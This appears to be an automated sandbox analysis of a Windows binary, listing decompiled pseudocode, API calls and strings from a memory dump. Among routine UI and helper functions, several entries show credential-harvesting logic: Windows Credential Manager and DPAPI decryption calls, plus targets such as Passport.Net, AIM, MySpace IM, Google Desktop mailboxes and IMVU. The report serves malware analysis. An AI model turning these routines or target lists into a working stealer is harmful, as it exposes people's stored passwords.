                                
                                				_t30 = _a4;
                                				if((_a8 & 0x00000001) != 0) {
                                					_t32 = GetParent(_t30);
                                					GetWindowRect(_t30,  &_v20);
                                					GetClientRect(_t32,  &_v36);
                                					MapWindowPoints(0, _t32,  &_v20, 2);
                                					_t27 = _v36.right - _v12 - _v36.left;
                                					_v20.x = _t27;
                                					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
                                				}
                                				if((_a8 & 0x00000002) != 0) {
                                					E00406DA8(_t30);
                                				}
                                				return 1;
                                			}










                                APIs
                                • GetParent.USER32(?), ref: 00408A7B
                                • GetWindowRect.USER32(?,?), ref: 00408A88
                                • GetClientRect.USER32(00000000,?), ref: 00408A93
                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00408AA3
                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00408ABF
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Window$Rect$ClientParentPoints
                                • String ID:
                                • API String ID: 4247780290-0
                                • Opcode ID: 3aa8e274ce559d31e536c38d989a921174712bd1f9a65828c633d0b3e27811af
                                • Instruction ID: 47fd7c03741454bdc7a166d99d5f54bcb442ad9a41c6e05a353417ffaf8a91e2
                                • Opcode Fuzzy Hash: 3aa8e274ce559d31e536c38d989a921174712bd1f9a65828c633d0b3e27811af
                                • Instruction Fuzzy Hash: 0F014832901129BBDB11DBA5DC49EFFBFBCEF86750F04802AFD11A2140D77895018BA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 89%
                                			E0040A627(intOrPtr* __ecx, intOrPtr _a4) {
                                				void _v259;
                                				char _v260;
                                				void _v515;
                                				char _v516;
                                				void* __esi;
                                				void* _t17;
                                				intOrPtr* _t26;
                                				char* _t28;
                                
                                				_t26 = __ecx;
                                				_v260 = 0;
                                				memset( &_v259, 0, 0xfe);
                                				_v516 = 0;
                                				memset( &_v515, 0, 0xfe);
                                				E004067EC(_a4, "<?xml version="1.0"  encoding="ISO-8859-1" ?>");
                                				_t17 =  *((intOrPtr*)( *_t26 + 0x20))();
                                				_t28 =  &_v260;
                                				E00409DD6(_t28, _t17);
                                				_push(_t28);
                                				sprintf( &_v516, "<%s>");
                                				return E004067EC(_a4,  &_v516);
                                			}












                                APIs
                                • memset.MSVCRT ref: 0040A64A
                                • memset.MSVCRT ref: 0040A660
                                  • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                  • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                  • Part of subcall function 00409DD6: _mbscpy.MSVCRT ref: 00409DDB
                                  • Part of subcall function 00409DD6: _strlwr.MSVCRT ref: 00409E1E
                                • sprintf.MSVCRT ref: 0040A697
                                Strings
                                • <%s>, xrefs: 0040A691
                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040A665
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                • API String ID: 3699762281-1998499579
                                • Opcode ID: ab5707da10e36317461923ea0a964ffd6f4046b5a0df19b15fd79c1ac8c7a337
                                • Instruction ID: 800cbe4d2eb2546f00b8b879064eadffaf4e9ad3efc3a30f3f6e1286e630d524
                                • Opcode Fuzzy Hash: ab5707da10e36317461923ea0a964ffd6f4046b5a0df19b15fd79c1ac8c7a337
                                • Instruction Fuzzy Hash: 92012B7294021977DB21A715CC46FDA7B6CAF14709F0400BBB50DF3082DB789B848BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: f3ce8d52872a8f30b96e2fbf292860e550b06a588b426c696271bbab4e9a7e1e
                                • Instruction ID: fe66dba444066183ee9975a3477c76674c14659d363ac613d024ab661048b2ad
                                • Opcode Fuzzy Hash: f3ce8d52872a8f30b96e2fbf292860e550b06a588b426c696271bbab4e9a7e1e
                                • Instruction Fuzzy Hash: 25F0FF726097015BD7209FAAB5C059BB7E9BB49725B60193FF54DD3682C738BC808A1C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 31%
                                			E004093D6(intOrPtr* __edi) {
                                				void* __esi;
                                				intOrPtr* _t7;
                                				intOrPtr* _t12;
                                				intOrPtr* _t18;
                                				intOrPtr _t21;
                                				intOrPtr _t22;
                                				intOrPtr _t23;
                                				intOrPtr _t24;
                                
                                				_t18 = __edi;
                                				 *__edi = 0x418528;
                                				E00409370(__edi);
                                				_t21 =  *((intOrPtr*)(__edi + 0x10));
                                				if(_t21 != 0) {
                                					E00407491(_t21);
                                					0x413d56(_t21);
                                				}
                                				_t22 =  *((intOrPtr*)(_t18 + 0xc));
                                				if(_t22 != 0) {
                                					E00407491(_t22);
                                					0x413d56(_t22);
                                				}
                                				_t23 =  *((intOrPtr*)(_t18 + 8));
                                				if(_t23 != 0) {
                                					E00407491(_t23);
                                					0x413d56(_t23);
                                				}
                                				_t24 =  *((intOrPtr*)(_t18 + 4));
                                				if(_t24 != 0) {
                                					E00407491(_t24);
                                					0x413d56(_t24);
                                				}
                                				_t12 = _t18;
                                				_t7 =  *((intOrPtr*)( *_t12))();
                                				0x413de6( *_t7);
                                				return _t7;
                                			}












                                APIs
                                  • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040937C
                                  • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040938A
                                  • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040939B
                                  • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093B2
                                  • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093BB
                                • ??3@YAXPAX@Z.MSVCRT ref: 004093F1
                                • ??3@YAXPAX@Z.MSVCRT ref: 00409404
                                • ??3@YAXPAX@Z.MSVCRT ref: 00409417
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040942A
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040943E
                                  • Part of subcall function 00407491: ??3@YAXPAX@Z.MSVCRT ref: 00407498
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: ac05d42046456b830cc0969aedd76e8629731d07fd3b456628963a844cb8144e
                                • Instruction ID: 09cfe481c9f5149ef6062cf2713671c90beccbfb684cd0f5c8863379cec44e3f
                                • Opcode Fuzzy Hash: ac05d42046456b830cc0969aedd76e8629731d07fd3b456628963a844cb8144e
                                • Instruction Fuzzy Hash: 67F06232D0E53167C9257F26B00158EA7646E46725315426FF8097B3D3CF3C6D8146EE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00406B6F: memset.MSVCRT ref: 00406B8F
                                  • Part of subcall function 00406B6F: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406BA2
                                  • Part of subcall function 00406B6F: _strcmpi.MSVCRT ref: 00406BB4
                                • SetBkMode.GDI32(?,00000001), ref: 00411B4E
                                • GetSysColor.USER32(00000005), ref: 00411B56
                                • SetBkColor.GDI32(?,00000000), ref: 00411B60
                                • SetTextColor.GDI32(?,00C00000), ref: 00411B6E
                                • GetSysColorBrush.USER32(00000005), ref: 00411B76
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Color$BrushClassModeNameText_strcmpimemset
                                • String ID:
                                • API String ID: 2775283111-0
                                • Opcode ID: 4c6c90dc6369ed9def7ad49a685608b6b97007b198ef546a8f3c4911ca2b9476
                                • Instruction ID: b9af807899647846139a12986955ac2cc84645abd360b6802fc8b760439410eb
                                • Opcode Fuzzy Hash: 4c6c90dc6369ed9def7ad49a685608b6b97007b198ef546a8f3c4911ca2b9476
                                • Instruction Fuzzy Hash: 92F03136104504FBDF112FA5EC09FDE3F25EF44721F10812AFA19951B1DB75A9A09B58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00404109: LoadLibraryA.KERNEL32(advapi32.dll,00000000,0040FFAB,75D6F420,?,?,?,?,?,?,?,?,?,?,?,0040DB18), ref: 00404116
                                  • Part of subcall function 00404109: GetProcAddress.KERNEL32(00000000,CredReadW), ref: 0040412F
                                  • Part of subcall function 00404109: GetProcAddress.KERNEL32(?,CredFree), ref: 0040413B
                                  • Part of subcall function 00404109: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404147
                                  • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                  • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 0041005B
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 00410071
                                • LocalFree.KERNEL32(?,?,00000000,?,?,?), ref: 0041007D
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressProc$ByteCharLibraryLoadMultiWide$FreeLocal
                                • String ID: Passport.Net\*
                                • API String ID: 4171712514-3671122194
                                • Opcode ID: 4033d74ea8b7e7d1449d062c3a122578251190037a8d9eb515b0a5cc15d38eb4
                                • Instruction ID: a8053254f1e515f4d897164d33fe2023de59da6d422685d1f9c73d0263123044
                                • Opcode Fuzzy Hash: 4033d74ea8b7e7d1449d062c3a122578251190037a8d9eb515b0a5cc15d38eb4
                                • Instruction Fuzzy Hash: 9231F7B1D01129AADB10DF95DC44EDEBBB8FF49750F11406BF610A7250D7789A81CBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                • GetFileSize.KERNEL32(00000000,00000000,MySpace\IM\users.txt,00000104,00000000,?,?,?,?,00410C45,?,00000000), ref: 00410AE7
                                  • Part of subcall function 00407A56: ??3@YAXPAX@Z.MSVCRT ref: 00407A5D
                                  • Part of subcall function 00407A56: ??2@YAPAXI@Z.MSVCRT ref: 00407A6B
                                  • Part of subcall function 00406ED6: ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,?,?,?,?,?,?,?,00410C45), ref: 00410B64
                                  • Part of subcall function 004108FA: memset.MSVCRT ref: 00410939
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00410C45,?,00000000), ref: 00410B78
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: File$??2@??3@ByteCharCloseCreateHandleMultiReadSizeWidememset
                                • String ID: MySpace\IM\users.txt
                                • API String ID: 429556018-1720829597
                                • Opcode ID: 9ecfc60a0865bdac6d3c577decf5946b40f4711ca6fbc71636231e6ee1035587
                                • Instruction ID: 28eca0bbeff0950369e7ada1521615d79b3b69832f60dc8e7f5924118cda3e2e
                                • Opcode Fuzzy Hash: 9ecfc60a0865bdac6d3c577decf5946b40f4711ca6fbc71636231e6ee1035587
                                • Instruction Fuzzy Hash: 21217171C0424AEFCF00DFA9CC458DEBB74EF41328B158166E924772A1C634AA45CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                • memset.MSVCRT ref: 00402873
                                  • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                • RegCloseKey.ADVAPI32(?), ref: 004028C2
                                • RegCloseKey.ADVAPI32(?), ref: 004028DF
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Close$EnumOpenmemset
                                • String ID: Software\AIM\AIMPRO
                                • API String ID: 2255314230-3527110354
                                • Opcode ID: dded90e1ec05a9ac15428789d49d31d8fd58391a594f54d73697f6d07bfadf32
                                • Instruction ID: 67585355273d4b01a1114a6cd89f6c97ebf6c1cbf8b7b4d496df69d3c229a794
                                • Opcode Fuzzy Hash: dded90e1ec05a9ac15428789d49d31d8fd58391a594f54d73697f6d07bfadf32
                                • Instruction Fuzzy Hash: 48115E76904118BADF21A792ED06FDE7B7CDF54304F0000B6AA44E1091EB756FD5DA64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E00407BC6(intOrPtr* _a4) {
                                				void* _v12;
                                				void* _v16;
                                				void _v271;
                                				char _v272;
                                				void** _t16;
                                				char* _t19;
                                				char* _t21;
                                				int _t26;
                                				void* _t28;
                                				void* _t29;
                                				void* _t30;
                                				void* _t31;
                                
                                				_t16 =  &_v12;
                                				0x411d68(0x80000001, "Software\Google\Google Desktop\Mailboxes", _t16);
                                				_t29 = _t28 + 0xc;
                                				if(_t16 == 0) {
                                					_t26 = 0;
                                					_v272 = 0;
                                					memset( &_v271, 0, 0xff);
                                					_t30 = _t29 + 0xc;
                                					_t19 =  &_v272;
                                					0x411dee(_v12, 0, _t19);
                                					while(1) {
                                						_t31 = _t30 + 0xc;
                                						if(_t19 != 0) {
                                							break;
                                						}
                                						_t21 =  &_v272;
                                						0x411d68(_v12, _t21,  &_v16);
                                						_t30 = _t31 + 0xc;
                                						if(_t21 == 0) {
                                							E00407A93(_a4, _v16,  &_v272);
                                							RegCloseKey(_v16);
                                						}
                                						_t19 =  &_v272;
                                						_t26 = _t26 + 1;
                                						0x411dee(_v12, _t26, _t19);
                                					}
                                					return RegCloseKey(_v12);
                                				}
                                				return _t16;
                                			}
















                                APIs
                                  • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                • memset.MSVCRT ref: 00407C05
                                  • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                • RegCloseKey.ADVAPI32(?), ref: 00407C54
                                • RegCloseKey.ADVAPI32(?), ref: 00407C71
                                Strings
                                • Software\Google\Google Desktop\Mailboxes, xrefs: 00407BD5
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Close$EnumOpenmemset
                                • String ID: Software\Google\Google Desktop\Mailboxes
                                • API String ID: 2255314230-2212045309
                                • Opcode ID: b50ec71faf233748746677e360152f00ca846f408f6190e6d0fa9129bc25d888
                                • Instruction ID: a9c93927ac610b6ef28ec82afd47bdb8c9c4627465144405bf34b6a811739c17
                                • Opcode Fuzzy Hash: b50ec71faf233748746677e360152f00ca846f408f6190e6d0fa9129bc25d888
                                • Instruction Fuzzy Hash: E9115EB6D04118BADF21AB91EC41FDEBB7CDF55304F0041B6BA04E1051E7756B94CEA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			E00403BF0(intOrPtr __ecx, void* __edx, void* __eflags, long long __fp0, void* _a4) {
                                				intOrPtr _v8;
                                				char _v272;
                                				void _v528;
                                				void _v536;
                                				char _v540;
                                				intOrPtr _v544;
                                				void* __edi;
                                				void* __esi;
                                				void* _t24;
                                				char* _t27;
                                				intOrPtr _t32;
                                				void* _t37;
                                				void* _t40;
                                				char* _t44;
                                				void* _t46;
                                
                                				_v544 = __ecx;
                                				_v540 = 0x417ea8;
                                				E0040D77D( &_v528);
                                				memset( &_v536, 0, 0x214);
                                				_t24 = memcpy( &_v528, _a4, 0x82 << 2);
                                				0x413d62( &_v272,  &_v528, _t40, _t46);
                                				_pop(_t37);
                                				if(_t24 != 0) {
                                					_t44 =  &_v272;
                                					_v8 = E004037A2(_t44, __fp0);
                                					_t27 = _t44;
                                					0x413d74( &_v528);
                                					_t37 = _t27;
                                					if(_t27 == 0) {
                                						_t32 = 0xa;
                                						if(_v8 > _t32) {
                                							_v8 = _t32;
                                						}
                                					}
                                				} else {
                                					_v8 = 1;
                                				}
                                				E00409D21(_t37, _v544,  &_v540);
                                				return 1;
                                			}



















                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _mbscmp_mbsicmpmemset
                                • String ID: :@
                                • API String ID: 1080945674-3074689909
                                • Opcode ID: fc6b87c77e97942f29d542673130d1b31dda64e9daeb6a0660619c666916343b
                                • Instruction ID: 05d51c46cf4b3144aa59074ae4edee5e5c3f47845a6acae635e5c8c721b5e64e
                                • Opcode Fuzzy Hash: fc6b87c77e97942f29d542673130d1b31dda64e9daeb6a0660619c666916343b
                                • Instruction Fuzzy Hash: 9911867250C3459AD720EEA5E809BDB77DCEB84315F004D3FF594E3181E7749609879A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _wcsnicmp.MSVCRT ref: 0041053E
                                  • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD18
                                  • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD21
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00410570
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00410587
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ByteCharMultiWidememset$_wcsnicmp
                                • String ID: windowslive:name=
                                • API String ID: 947294041-3311407311
                                • Opcode ID: fd4d89018f6d8f297b5807dfdb0caed421d73eceed85ab27545bd491571ae371
                                • Instruction ID: aaacd06d763df2f40df435721f5dd751edfa9d120b015f6101ff871e9026a9e8
                                • Opcode Fuzzy Hash: fd4d89018f6d8f297b5807dfdb0caed421d73eceed85ab27545bd491571ae371
                                • Instruction Fuzzy Hash: A80184B6604209BFD710DF59DC84DD77BECEB49364F10462ABA28D72A1D630DD04CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040F325
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040F339
                                • _wcsnicmp.MSVCRT ref: 0040F347
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ByteCharMultiWide$_wcsnicmp
                                • String ID: http://www.imvu.com
                                • API String ID: 1082246498-3717390816
                                • Opcode ID: d858862f83375720269192bc115d82f05b3495ae824a477da88cd8a016989edf
                                • Instruction ID: a621eff572e40bce3e368aabcc4a0ad2a08d37bae4b59898fbad6a548f86f146
                                • Opcode Fuzzy Hash: d858862f83375720269192bc115d82f05b3495ae824a477da88cd8a016989edf
                                • Instruction Fuzzy Hash: CD1152B2544349AED7309E599C84EEB7FACEB89364F10062EB96892191D7305A14C6B2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memcpy.MSVCRT ref: 004108AE
                                • memcpy.MSVCRT ref: 004108C0
                                • DialogBoxParamA.USER32(0000006B,?,Function_000105A6,00000000), ref: 004108E4
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcpy$DialogParam
                                • String ID: ;4
                                • API String ID: 392721444-4181167889
                                • Opcode ID: c5f1268ccc674415783c8697f9a32e79e000757815ba7d6e947a1f9e053f7934
                                • Instruction ID: 2aaa1d25541d53f243854b8b99eb4e9492d8e88977a0f1258d463d5600498ee3
                                • Opcode Fuzzy Hash: c5f1268ccc674415783c8697f9a32e79e000757815ba7d6e947a1f9e053f7934
                                • Instruction Fuzzy Hash: 86F0A771A44730BBF7216F55BC06BC67A91AB08B06F218036F545A51D0C3B925D08FDC
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 40%
                                			E00406B6F(struct HWND__* _a4) {
                                				void _v259;
                                				char _v260;
                                				signed int _t10;
                                
                                				_v260 = 0;
                                				memset( &_v259, 0, 0xff);
                                				GetClassNameA(_a4,  &_v260, 0xff);
                                				_t10 =  &_v260;
                                				0x413dce(_t10, "edit");
                                				asm("sbb eax, eax");
                                				return  ~_t10 + 1;
                                			}







                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ClassName_strcmpimemset
                                • String ID: edit
                                • API String ID: 275601554-2167791130
                                • Opcode ID: 1fc934d62d77a70a9e396aa4a7c9eacbfe567db38c0b85652fff254433e2e45d
                                • Instruction ID: aca7036e1f85a757735cd09c7bf6aa39e2ce89dfda263754777898d954571a1f
                                • Opcode Fuzzy Hash: 1fc934d62d77a70a9e396aa4a7c9eacbfe567db38c0b85652fff254433e2e45d
                                • Instruction Fuzzy Hash: 61E09BB3C5012A6ADB11AA64EC05FE5376C9F54705F0001F6B949E2081E5B457C44B94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00401085(void* __edi) {
                                				struct tagLOGFONTA _v64;
                                				int* _t12;
                                
                                				E00406A19( &_v64, "MS Sans Serif", 0xa, 1);
                                				_t12 = __edi + 0x20c;
                                				 *_t12 = CreateFontIndirectA( &_v64);
                                				return SendMessageA(GetDlgItem( *(__edi + 4), 0x3ec), 0x30,  *_t12, 0);
                                			}






                                APIs
                                  • Part of subcall function 00406A19: memset.MSVCRT ref: 00406A23
                                  • Part of subcall function 00406A19: _mbscpy.MSVCRT ref: 00406A63
                                • CreateFontIndirectA.GDI32(?), ref: 004010AA
                                • GetDlgItem.USER32(?,000003EC), ref: 004010BA
                                • SendMessageA.USER32(00000000,00000030,?,00000000), ref: 004010C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: CreateFontIndirectItemMessageSend_mbscpymemset
                                • String ID: MS Sans Serif
                                • API String ID: 2650341901-168460110
                                • Opcode ID: e4ca45643e333f1720333046815af32c43876757aaae09a92ca8bc646b2ccae1
                                • Instruction ID: 5c9505941c48c8dd7a2399cb1aaf590a0077e647136f214fd0fe6491ebdd60b9
                                • Opcode Fuzzy Hash: e4ca45643e333f1720333046815af32c43876757aaae09a92ca8bc646b2ccae1
                                • Instruction Fuzzy Hash: 67E06D71A40604FBCB116BA0EC0AFCABB6CAB44700F108125FA51B60E1D7B0A114CB88
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • LoadLibraryA.KERNEL32(shell32.dll,00412251,00000000,00000104), ref: 004121A0
                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004121B5
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: SHGetSpecialFolderPathA$shell32.dll
                                • API String ID: 2574300362-543337301
                                • Opcode ID: 65bafe7a062dc340e9a6b521779d20cd872f84261b23a2d66ef8095fb01f6124
                                • Instruction ID: a03a44e40ad870f41b9c2d8f2e6b277420dcc77a40eb9148cfb32e265f33a348
                                • Opcode Fuzzy Hash: 65bafe7a062dc340e9a6b521779d20cd872f84261b23a2d66ef8095fb01f6124
                                • Instruction Fuzzy Hash: 2ED0C978A00302EBEB20DF61BD597D63FA8A74C711F20C036F905D2262DBB865D0CA2C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??2@$memset
                                • String ID:
                                • API String ID: 1860491036-0
                                • Opcode ID: cefea47da0d948a8b2b7f14bfbe4bf7bfbc63bea052a784fe90b9effbb1e0511
                                • Instruction ID: 077d2ad6405c458e4821e20ddf5ab0b81a66c3d9f88b424bd3f36c9f492752c9
                                • Opcode Fuzzy Hash: cefea47da0d948a8b2b7f14bfbe4bf7bfbc63bea052a784fe90b9effbb1e0511
                                • Instruction Fuzzy Hash: F0310AB4A007008FDB609F2AD945692FBF4FF84305F25886FD549CB262D7B8D491CB19
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _strcmpistrchr$_mbscpymemsetstrrchr
                                • String ID:
                                • API String ID: 274398480-0
                                • Opcode ID: 8152aa6171c4159ef6465b31656666253e18c95892931f65106702393bd21b79
                                • Instruction ID: 328b4c9133cd54f2635944cbca80cb08cea31e8af7c0159c33255436c65d5f23
                                • Opcode Fuzzy Hash: 8152aa6171c4159ef6465b31656666253e18c95892931f65106702393bd21b79
                                • Instruction Fuzzy Hash: C601D6756082087AEB20BB72DC03FCB3B9C8F1175AF10005FF689A50D1EEA8D6C146AD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0040C9C7(void* __edi, void* __esi, void* _a4) {
                                				signed int _t13;
                                				signed int _t25;
                                				int _t26;
                                				char* _t30;
                                				void* _t31;
                                				void* _t33;
                                				void* _t35;
                                
                                				_t35 = __esi;
                                				_t25 = 0x3f;
                                				_t13 =  *(__esi + 0x10) >> 0x00000003 & _t25;
                                				_t30 = __esi + 0x18 + _t13;
                                				 *_t30 = 0x80;
                                				_t26 = _t25 - _t13;
                                				_t31 = _t30 + 1;
                                				if(_t26 >= 8) {
                                					memset(_t31, 0, _t26 + 0xfffffff8);
                                				} else {
                                					memset(_t31, 0, _t26);
                                					_t33 = __esi + 0x18;
                                					E0040CA46(_t33, __esi);
                                					memset(_t33, 0, 0x38);
                                				}
                                				 *((intOrPtr*)(_t35 + 0x50)) =  *((intOrPtr*)(_t35 + 0x10));
                                				 *((intOrPtr*)(_t35 + 0x54)) =  *((intOrPtr*)(_t35 + 0x14));
                                				E0040CA46(_t35 + 0x18, _t35);
                                				memcpy(_a4, _t35, 0x10);
                                				return memset(_t35, 0, 4);
                                			}











                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$memcpy
                                • String ID:
                                • API String ID: 368790112-0
                                • Opcode ID: db955d66aa391fc484fd506110ad959e30d2163aa55218731a18cbda7d247bce
                                • Instruction ID: 72ff1d110960cc82dd2bfc388b685e2dd0a1937d99bf851f24f672c8116534dd
